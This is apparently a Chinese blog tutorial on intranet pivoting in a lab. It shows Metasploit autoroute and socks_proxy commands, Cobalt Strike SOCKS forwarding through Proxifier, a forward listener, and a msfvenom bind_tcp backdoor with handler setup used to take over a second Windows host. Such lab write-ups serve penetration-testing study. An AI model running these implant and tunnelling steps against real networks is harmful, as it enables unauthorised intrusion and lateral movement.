内网安全-代理技术-socket协议

小迪安全网络架构图:

背景:当前获取window7 出网主机的shell。

1.使用msf上线,查看路由

run autoroute -p

添加路由:

run post/multi/manage/autoroute

使用socks模块开启节点,作为流量跳板

msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy

msf6 auxiliary(server/socks_proxy) > set srvport 1122

srvport => 1122

msf6 auxiliary(server/socks_proxy) > run

使用socket cap 进行代理

2.使用cs进行渗透测试

windwos7上线cs木马

点击代理转发选择socket

输入账户密码后,使用proifixer进行流量转发

配置为目标站点走socket5

3.使用cs进行windows10 上线cs

方案:创建木马将数据传递给本地4444端口

使用window7正向连接目标4444端口

cs配置正向监听器:

生成木马:

模拟执行木马,在windows7交互会话窗口:

connect 192.168.11.129 4444 即可上线

4.使用msf进行windows10 上线

生成正向连接后门:msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=2222 -f exe > bd.exe

放置windows10上运行

msf执行:

msf6 exploit(multi/handler) > use exploit/multi/handler

\* Using configured payload windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf6 exploit(multi/handler) > set rhost 192.168.11.129

rhost => 192.168.11.129

msf6 exploit(multi/handler) > set lport 2222

lport => 2222

msf6 exploit(multi/handler) > run

相关推荐
一楼的猫1 小时前
AI写作检测机制技术深度解析:200+维度检测、叙事指纹与网文AI辅助怎么过审
人工智能·学习·安全·chatgpt·ai写作
技术不好的崎鸣同学2 小时前
[极客大挑战 2019]EasySQL 思路及解法
网络·安全·web安全
Kyrie6782 小时前
Januscape:潜伏 16 年的 KVM 虚拟机逃逸漏洞
安全·kvm
wtsolutions3 小时前
Excel-to-JSON本地化Excel插件发布 - 在Excel中安全离线转换数据
安全·json·excel
AI创界者3 小时前
【实战演练】基于 Kali Linux 的自动化漏洞扫描与安全加固指南
网络·安全·web安全
听你说324 小时前
五新智能:以成套智能装备赋能全球工程建设
安全·创业创新
小五传输4 小时前
内外网文件交换系统产品推荐 解决隔离网络文件交换5类难题
大数据·运维·安全
技术不好的崎鸣同学16 小时前
[ACTF2020 新生赛]Exec 思路及解法
算法·安全·web安全
MartinYeung51 天前
[论文学习]SecureGate:通过令牌级门控学习何时安全地揭示PII-深度解析
学习·安全
广州市顺风搬家服务有限公司1 天前
实验室搬迁科普专业流程防护标准与合规核心要点
网络·其他·安全